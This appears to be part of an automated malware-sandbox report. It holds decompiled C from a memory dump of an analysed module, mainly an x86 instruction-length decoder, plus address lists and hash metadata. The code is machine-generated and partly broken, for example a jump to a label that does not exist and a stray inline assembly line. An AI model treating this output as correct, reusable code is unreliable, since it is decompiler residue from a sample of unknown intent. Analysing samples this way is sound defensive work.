                                                                                                                                                  								if( *_t310 ==  *_t429) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t444 = _t444 + 1;
                                                                                                                                                  								__eflags = _t444 - _t430;
                                                                                                                                                  								if(_t444 < _t430) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L11;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t444 - 0xffffffff;
                                                                                                                                                  							if(_t444 == 0xffffffff) {
                                                                                                                                                  								goto L11;
                                                                                                                                                  							}
                                                                                                                                                  							L20:
                                                                                                                                                  							_t324 = _t324 + 1;
                                                                                                                                                  							__eflags = _t324 -  *( *(_t449 + 4));
                                                                                                                                                  						} while (_t324 <  *( *(_t449 + 4)));
                                                                                                                                                  						goto L21;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}























































                                                                                                                                                  0x6e9a89ab
                                                                                                                                                  0x6e9a89ae
                                                                                                                                                  0x6e9a89b1
                                                                                                                                                  0x6e9a89b4
                                                                                                                                                  0x6e9a89ba
                                                                                                                                                  0x6e9a89c1
                                                                                                                                                  0x6e9a89c5
                                                                                                                                                  0x6e9a89ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a89ce
                                                                                                                                                  0x6e9a89bc
                                                                                                                                                  0x6e9a89bf
                                                                                                                                                  0x6e9a89d8
                                                                                                                                                  0x6e9a89f0
                                                                                                                                                  0x6e9a89f3
                                                                                                                                                  0x6e9a89f8
                                                                                                                                                  0x6e9a8a02
                                                                                                                                                  0x6e9a8a05
                                                                                                                                                  0x6e9a8a08
                                                                                                                                                  0x6e9a8a11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8a11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a89bf
                                                                                                                                                  0x6e9a8854
                                                                                                                                                  0x6e9a8854
                                                                                                                                                  0x6e9a8856
                                                                                                                                                  0x6e9a885a
                                                                                                                                                  0x6e9a885f
                                                                                                                                                  0x6e9a8861
                                                                                                                                                  0x6e9a8865
                                                                                                                                                  0x6e9a8868
                                                                                                                                                  0x6e9a8870
                                                                                                                                                  0x6e9a8872
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8889
                                                                                                                                                  0x6e9a88a4
                                                                                                                                                  0x6e9a88a6
                                                                                                                                                  0x6e9a88b4
                                                                                                                                                  0x6e9a88b9
                                                                                                                                                  0x6e9a88bb
                                                                                                                                                  0x6e9a88d8
                                                                                                                                                  0x6e9a88d8
                                                                                                                                                  0x6e9a88dc
                                                                                                                                                  0x6e9a88de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88e0
                                                                                                                                                  0x6e9a88e3
                                                                                                                                                  0x6e9a8904
                                                                                                                                                  0x6e9a8923
                                                                                                                                                  0x6e9a8929
                                                                                                                                                  0x6e9a892c
                                                                                                                                                  0x6e9a8931
                                                                                                                                                  0x6e9a8932
                                                                                                                                                  0x6e9a8939
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8941
                                                                                                                                                  0x6e9a8941
                                                                                                                                                  0x6e9a8943
                                                                                                                                                  0x6e9a894f
                                                                                                                                                  0x6e9a895b
                                                                                                                                                  0x6e9a897d
                                                                                                                                                  0x6e9a8982
                                                                                                                                                  0x6e9a8983
                                                                                                                                                  0x6e9a8983
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8943
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88e3
                                                                                                                                                  0x6e9a88bd
                                                                                                                                                  0x6e9a88c3
                                                                                                                                                  0x6e9a88c5
                                                                                                                                                  0x6e9a88c6
                                                                                                                                                  0x6e9a88c7
                                                                                                                                                  0x6e9a88c8
                                                                                                                                                  0x6e9a88cc
                                                                                                                                                  0x6e9a88d0
                                                                                                                                                  0x6e9a88d2
                                                                                                                                                  0x6e9a88d3
                                                                                                                                                  0x6e9a88d4
                                                                                                                                                  0x6e9a88d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88d6
                                                                                                                                                  0x6e9a88e9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88e9
                                                                                                                                                  0x6e9a86d8
                                                                                                                                                  0x6e9a86da
                                                                                                                                                  0x6e9a86dc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a86e6
                                                                                                                                                  0x6e9a86e6
                                                                                                                                                  0x6e9a86e8
                                                                                                                                                  0x6e9a86eb
                                                                                                                                                  0x6e9a86ed
                                                                                                                                                  0x6e9a86f5
                                                                                                                                                  0x6e9a86fc
                                                                                                                                                  0x6e9a8700
                                                                                                                                                  0x6e9a8703
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a87ff
                                                                                                                                                  0x6e9a8800
                                                                                                                                                  0x6e9a8802
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8802
                                                                                                                                                  0x6e9a8709
                                                                                                                                                  0x6e9a870c
                                                                                                                                                  0x6e9a8715
                                                                                                                                                  0x6e9a871a
                                                                                                                                                  0x6e9a871c
                                                                                                                                                  0x6e9a8728
                                                                                                                                                  0x6e9a872c
                                                                                                                                                  0x6e9a8731
                                                                                                                                                  0x6e9a8735
                                                                                                                                                  0x6e9a8b12
                                                                                                                                                  0x6e9a8b26
                                                                                                                                                  0x6e9a8b48
                                                                                                                                                  0x6e9a8b4d
                                                                                                                                                  0x6e9a8b4d
                                                                                                                                                  0x6e9a874b
                                                                                                                                                  0x6e9a8750
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8759
                                                                                                                                                  0x6e9a875e
                                                                                                                                                  0x6e9a8760
                                                                                                                                                  0x6e9a8764
                                                                                                                                                  0x6e9a876b
                                                                                                                                                  0x6e9a8770
                                                                                                                                                  0x6e9a8772
                                                                                                                                                  0x6e9a8ad3
                                                                                                                                                  0x6e9a8ae2
                                                                                                                                                  0x6e9a8afb
                                                                                                                                                  0x6e9a8b00
                                                                                                                                                  0x6e9a8b00
                                                                                                                                                  0x6e9a8785
                                                                                                                                                  0x6e9a878a
                                                                                                                                                  0x6e9a878e
                                                                                                                                                  0x6e9a878e
                                                                                                                                                  0x6e9a878e
                                                                                                                                                  0x6e9a87a0
                                                                                                                                                  0x6e9a87c1
                                                                                                                                                  0x6e9a87c9
                                                                                                                                                  0x6e9a87d7
                                                                                                                                                  0x6e9a87f5
                                                                                                                                                  0x6e9a87fb
                                                                                                                                                  0x6e9a87fb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a870c
                                                                                                                                                  0x6e9a85a4
                                                                                                                                                  0x6e9a85a4
                                                                                                                                                  0x6e9a85a6
                                                                                                                                                  0x6e9a85ad
                                                                                                                                                  0x6e9a85bb
                                                                                                                                                  0x6e9a85bd
                                                                                                                                                  0x6e9a85c1
                                                                                                                                                  0x6e9a85c3
                                                                                                                                                  0x6e9a85c5
                                                                                                                                                  0x6e9a8600
                                                                                                                                                  0x6e9a860f
                                                                                                                                                  0x6e9a8611
                                                                                                                                                  0x6e9a8613
                                                                                                                                                  0x6e9a8631
                                                                                                                                                  0x6e9a8633
                                                                                                                                                  0x6e9a8635
                                                                                                                                                  0x6e9a8647
                                                                                                                                                  0x6e9a8665

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                                                                  • Instruction ID: dffc03f49a50d40e9ef5d7d8e45edb5f2351a12901cb61dceb03f6bffeb9055a
                                                                                                                                                  • Opcode Fuzzy Hash: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                                                                  • Instruction Fuzzy Hash: 53123D716082459FC764DFA8C898AAEB7E9EFD5708F104D2DE699872A1DB30DC05CF42
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                                  			E6E9B9370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                  				signed int _t250;
                                                                                                                                                  				signed char _t251;
                                                                                                                                                  				signed char* _t254;
                                                                                                                                                  				char _t255;
                                                                                                                                                  				signed short _t256;
                                                                                                                                                  				char _t257;
                                                                                                                                                  				signed short _t260;
                                                                                                                                                  				signed int _t261;
                                                                                                                                                  				signed int _t262;
                                                                                                                                                  				void* _t264;
                                                                                                                                                  				void* _t272;
                                                                                                                                                  				void* _t273;
                                                                                                                                                  				signed short* _t274;
                                                                                                                                                  				signed char _t275;
                                                                                                                                                  				signed int _t277;
                                                                                                                                                  				signed int _t278;
                                                                                                                                                  				void* _t282;
                                                                                                                                                  				signed int _t288;
                                                                                                                                                  				unsigned int _t290;
                                                                                                                                                  				signed int _t292;
                                                                                                                                                  				signed int _t293;
                                                                                                                                                  				signed int _t294;
                                                                                                                                                  				signed int _t295;
                                                                                                                                                  				unsigned int _t296;
                                                                                                                                                  				unsigned int _t297;
                                                                                                                                                  				signed int _t299;
                                                                                                                                                  				unsigned int _t301;
                                                                                                                                                  				signed char _t302;
                                                                                                                                                  				signed int _t304;
                                                                                                                                                  				signed char _t307;
                                                                                                                                                  				signed char _t308;
                                                                                                                                                  				signed int _t309;
                                                                                                                                                  				void* _t312;
                                                                                                                                                  				void* _t313;
                                                                                                                                                  				signed int _t314;
                                                                                                                                                  				signed int _t316;
                                                                                                                                                  				signed int _t319;
                                                                                                                                                  				signed int _t321;
                                                                                                                                                  				signed int _t338;
                                                                                                                                                  				signed int _t339;
                                                                                                                                                  				signed int _t343;
                                                                                                                                                  				signed int _t345;
                                                                                                                                                  				unsigned int* _t346;
                                                                                                                                                  				unsigned int _t354;
                                                                                                                                                  				signed int _t355;
                                                                                                                                                  				void* _t357;
                                                                                                                                                  				signed int _t364;
                                                                                                                                                  				signed int _t366;
                                                                                                                                                  				signed int _t383;
                                                                                                                                                  				signed int _t388;
                                                                                                                                                  				signed int _t391;
                                                                                                                                                  				signed int _t395;
                                                                                                                                                  				signed int _t396;
                                                                                                                                                  				signed int _t397;
                                                                                                                                                  				signed int _t398;
                                                                                                                                                  				signed int _t399;
                                                                                                                                                  				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E9B3698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L18:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L19;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L18;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L19;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L14:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L14;
						}
						if (_t250 == 0x66) goto L13;
						asm("adc [ebx+0x587567f8], eax");
					}
					L19:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L115;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L53:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L86:
								if(_t427[2] <= 5) {
									L88:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
                                                                                                                                                  											 *(_t277 + 0x18) = _t343;
                                                                                                                                                  											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
                                                                                                                                                  										} else {
                                                                                                                                                  											if(_t357 == 4) {
                                                                                                                                                  												_t278 = _t427[0x10];
                                                                                                                                                  												_t343 = _t343 | 0x00000080;
                                                                                                                                                  												 *(_t278 + 0x18) = _t343;
                                                                                                                                                  												 *(_t278 + 0x14) =  *(_t427[4] - 1);
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									_t195 = _t427[4] - 1; // -1
                                                                                                                                                  									_t274 = _t357 + _t195;
                                                                                                                                                  									L115:
                                                                                                                                                  									_t251 = _t427[1];
                                                                                                                                                  									_t292 = _t251 & 0x00000040;
                                                                                                                                                  									if((_t251 & 0x00000010) == 0) {
                                                                                                                                                  										L122:
                                                                                                                                                  										if((_t427[1] & 0x00000004) == 0) {
                                                                                                                                                  											L130:
                                                                                                                                                  											if((_t427[1] & 0x00000002) != 0) {
                                                                                                                                                  												_t396 = _t427[0x10];
                                                                                                                                                  												_t343 = _t343 | 0x00000004;
                                                                                                                                                  												 *(_t396 + 0x18) = _t343;
                                                                                                                                                  												_t257 =  *_t274;
                                                                                                                                                  												_t274 =  &(_t274[0]);
                                                                                                                                                  												 *((char*)(_t396 + 0x10)) = _t257;
                                                                                                                                                  											}
                                                                                                                                                  											if(_t292 == 0) {
                                                                                                                                                  												if((_t427[1] & 0x00000020) != 0) {
                                                                                                                                                  													_t293 = _t427[0x10];
                                                                                                                                                  													_t343 = _t343 | 0x00000104;
                                                                                                                                                  													 *(_t293 + 0x18) = _t343;
                                                                                                                                                  													_t255 =  *_t274;
                                                                                                                                                  													_t274 =  &(_t274[0]);
                                                                                                                                                  													 *((char*)(_t293 + 0x10)) = _t255;
                                                                                                                                                  												}
                                                                                                                                                  												goto L136;
                                                                                                                                                  											} else {
                                                                                                                                                  												L133:
                                                                                                                                                  												_t294 = _t427[0x10];
                                                                                                                                                  												_t343 = _t343 | 0x00000110;
                                                                                                                                                  												 *(_t294 + 0x18) = _t343;
                                                                                                                                                  												_t256 =  *_t274;
                                                                                                                                                  												_t274 =  &(_t274[2]);
                                                                                                                                                  												 *(_t294 + 0x10) = _t256;
                                                                                                                                                  												L136:
                                                                                                                                                  												_t275 = _t274 - _t427[0xf];
                                                                                                                                                  												if(_t275 <= 0xf) {
                                                                                                                                                  													 *(_t427[0x10]) = _t275;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t254 = _t427[0x10];
                                                                                                                                                  													_t275 = 0xf;
                                                                                                                                                  													_t254[0x18] = _t343 | 0x00005000;
                                                                                                                                                  													 *_t254 = _t275;
                                                                                                                                                  												}
                                                                                                                                                  												return _t275 & 0x000000ff;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										if((_t343 & 0x00000010) == 0) {
                                                                                                                                                  											if((_t343 & 0x00000008) == 0) {
                                                                                                                                                  												_t397 = _t427[0x10];
                                                                                                                                                  												_t343 = _t343 | 0x00000008;
                                                                                                                                                  												 *(_t397 + 0x18) = _t343;
                                                                                                                                                  												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
                                                                                                                                                  												L129:
                                                                                                                                                  												_t274 =  &(_t274[1]);
                                                                                                                                                  												goto L130;
                                                                                                                                                  											}
                                                                                                                                                  											_t398 = _t427[0x10];
                                                                                                                                                  											_t343 = _t343 | 0x00000800;
                                                                                                                                                  											L127:
                                                                                                                                                  											 *(_t398 + 0x18) = _t343;
                                                                                                                                                  											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
                                                                                                                                                  											goto L129;
                                                                                                                                                  										}
                                                                                                                                                  										_t398 = _t427[0x10];
                                                                                                                                                  										_t343 = _t343 | 0x00000008;
                                                                                                                                                  										goto L127;
                                                                                                                                                  									}
                                                                                                                                                  									if(_t292 == 0) {
                                                                                                                                                  										if(( *_t427 & 0x00000008) == 0) {
                                                                                                                                                  											_t399 = _t427[0x10];
                                                                                                                                                  											_t343 = _t343 | 0x00000010;
                                                                                                                                                  											 *(_t399 + 0x18) = _t343;
                                                                                                                                                  											_t260 =  *_t274;
                                                                                                                                                  											_t274 =  &(_t274[2]);
                                                                                                                                                  											 *(_t399 + 0x10) = _t260;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t400 = _t427[0x10];
                                                                                                                                                  											_t343 = _t343 | 0x00000008;
                                                                                                                                                  											 *(_t400 + 0x18) = _t343;
                                                                                                                                                  											_t261 =  *_t274 & 0x0000ffff;
                                                                                                                                                  											_t274 =  &(_t274[1]);
                                                                                                                                                  											 *(_t400 + 0x10) = _t261;
                                                                                                                                                  										}
                                                                                                                                                  										goto L122;
                                                                                                                                                  									}
                                                                                                                                                  									if(( *_t427 & 0x00000008) == 0) {
                                                                                                                                                  										goto L133;
                                                                                                                                                  									}
                                                                                                                                                  									_t295 = _t427[0x10];
                                                                                                                                                  									_t343 = _t343 | 0x00000108;
                                                                                                                                                  									 *(_t295 + 0x18) = _t343;
                                                                                                                                                  									_t262 =  *_t274 & 0x0000ffff;
                                                                                                                                                  									_t274 =  &(_t274[1]);
                                                                                                                                                  									 *(_t295 + 0x10) = _t262;
                                                                                                                                                  									goto L136;
                                                                                                                                                  								}
                                                                                                                                                  								L87:
                                                                                                                                                  								_t343 = _t343 | 0x00011000;
                                                                                                                                                  								 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                  								goto L88;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t250 != 0x8e) {
                                                                                                                                                  								L67:
                                                                                                                                                  								if(_t427[3] != 3) {
                                                                                                                                                  									if(_t427[5] == 0) {
                                                                                                                                                  										goto L88;
                                                                                                                                                  									}
                                                                                                                                                  									if(_t250 == 0xd7 || _t250 == 0xf7) {
                                                                                                                                                  										L84:
                                                                                                                                                  										if(( *_t427 & 0x00000009) != 0) {
                                                                                                                                                  											goto L87;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										if(_t250 == 0xd6) {
                                                                                                                                                  											if(( *_t427 & 0x00000006) != 0) {
                                                                                                                                                  												goto L87;
                                                                                                                                                  											}
                                                                                                                                                  											goto L88;
                                                                                                                                                  										}
                                                                                                                                                  										if(_t250 == 0xc5) {
                                                                                                                                                  											goto L87;
                                                                                                                                                  										}
                                                                                                                                                  										if(_t250 == 0x50) {
                                                                                                                                                  											goto L84;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L88;
                                                                                                                                                  								}
                                                                                                                                                  								_t364 = _t427[4];
                                                                                                                                                  								_t312 = _t364 + 0x1da;
                                                                                                                                                  								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
                                                                                                                                                  								_t313 =  !=  ? _t427[9] + _t364 : _t312;
                                                                                                                                                  								_t427[4] = _t366;
                                                                                                                                                  								if(_t366 == _t313) {
                                                                                                                                                  									goto L88;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L69;
                                                                                                                                                  								}
                                                                                                                                                  								while(1) {
                                                                                                                                                  									L69:
                                                                                                                                                  									_t408 = _t427[4];
                                                                                                                                                  									if(_t250 ==  *_t408) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t411 = _t408 + 3;
                                                                                                                                                  									_t427[4] = _t411;
                                                                                                                                                  									if(_t411 != _t313) {
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									goto L88;
                                                                                                                                                  								}
                                                                                                                                                  								_t314 = _t408;
                                                                                                                                                  								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
                                                                                                                                                  									goto L88;
                                                                                                                                                  								}
                                                                                                                                                  								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                                                                  									goto L87;
                                                                                                                                                  								}
                                                                                                                                                  								goto L88;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t427[2] == 1) {
                                                                                                                                                  								goto L87;
                                                                                                                                                  							}
                                                                                                                                                  							goto L86;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t250 == 0x20 || _t250 == 0x22) {
                                                                                                                                                  							_t316 = 3;
                                                                                                                                                  							_t427[3] = _t316;
                                                                                                                                                  							if(_t427[2] > 4 || _t427[2] == 1) {
                                                                                                                                                  								goto L87;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L88;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_t250 == 0x21 || _t250 == 0x23) {
                                                                                                                                                  								_t319 = 3;
                                                                                                                                                  								_t427[3] = _t319;
                                                                                                                                                  								if((_t427[6] & 0xfffffff0) == 0x20) {
                                                                                                                                                  									goto L87;
                                                                                                                                                  								}
                                                                                                                                                  								goto L88;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L67;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if(_t427[3] == 3) {
                                                                                                                                                  						L52:
                                                                                                                                                  						_t343 = _t343 | 0x00009000;
                                                                                                                                                  						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                                  						goto L53;
                                                                                                                                                  					}
                                                                                                                                                  					_t412 = _t427[4];
                                                                                                                                                  					_t321 = _t250;
                                                                                                                                                  					_t427[8] = _t412 + 0x1b9;
                                                                                                                                                  					if(_t427[5] == 0) {
                                                                                                                                                  						_t413 = _t412 + 0x1a1;
                                                                                                                                                  						_t321 = _t250 & 0x000000fe;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t413 = _t427[8];
                                                                                                                                                  						_t427[8] = _t412 + 0x1cb;
                                                                                                                                                  					}
                                                                                                                                                  					while(_t413 != _t427[8]) {
                                                                                                                                                  						if(_t321 ==  *_t413) {
                                                                                                                                                  							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                                                                  								goto L53;
                                                                                                                                                  							}
                                                                                                                                                  							goto L52;
                                                                                                                                                  						}
                                                                                                                                                  						_t413 = _t413 + 2;
                                                                                                                                                  					}
                                                                                                                                                  					goto L52;
                                                                                                                                                  				}
                                                                                                                                                  			}
                                                                                                                                                  0x6e9b9829
                                                                                                                                                  0x6e9b9829
                                                                                                                                                  0x6e9b97f2
                                                                                                                                                  0x6e9b97f7
                                                                                                                                                  0x6e9b9816
                                                                                                                                                  0x6e9b97f9
                                                                                                                                                  0x6e9b97fe
                                                                                                                                                  0x6e9b980f
                                                                                                                                                  0x6e9b9800
                                                                                                                                                  0x6e9b9800
                                                                                                                                                  0x6e9b9800
                                                                                                                                                  0x6e9b97fe
                                                                                                                                                  0x6e9b97f7
                                                                                                                                                  0x6e9b9840
                                                                                                                                                  0x6e9b984f
                                                                                                                                                  0x6e9b985c
                                                                                                                                                  0x6e9b9865
                                                                                                                                                  0x6e9b9869
                                                                                                                                                  0x6e9b986d
                                                                                                                                                  0x6e9b9870
                                                                                                                                                  0x6e9b9873
                                                                                                                                                  0x6e9b9876
                                                                                                                                                  0x6e9b9879
                                                                                                                                                  0x6e9b987c
                                                                                                                                                  0x6e9b9882
                                                                                                                                                  0x6e9b9886
                                                                                                                                                  0x6e9b988c
                                                                                                                                                  0x6e9b988c
                                                                                                                                                  0x6e9b9882
                                                                                                                                                  0x6e9b9892
                                                                                                                                                  0x6e9b98cf
                                                                                                                                                  0x6e9b98d3
                                                                                                                                                  0x6e9b98da
                                                                                                                                                  0x6e9b98e0
                                                                                                                                                  0x6e9b9894
                                                                                                                                                  0x6e9b9897
                                                                                                                                                  0x6e9b98b7
                                                                                                                                                  0x6e9b98bb
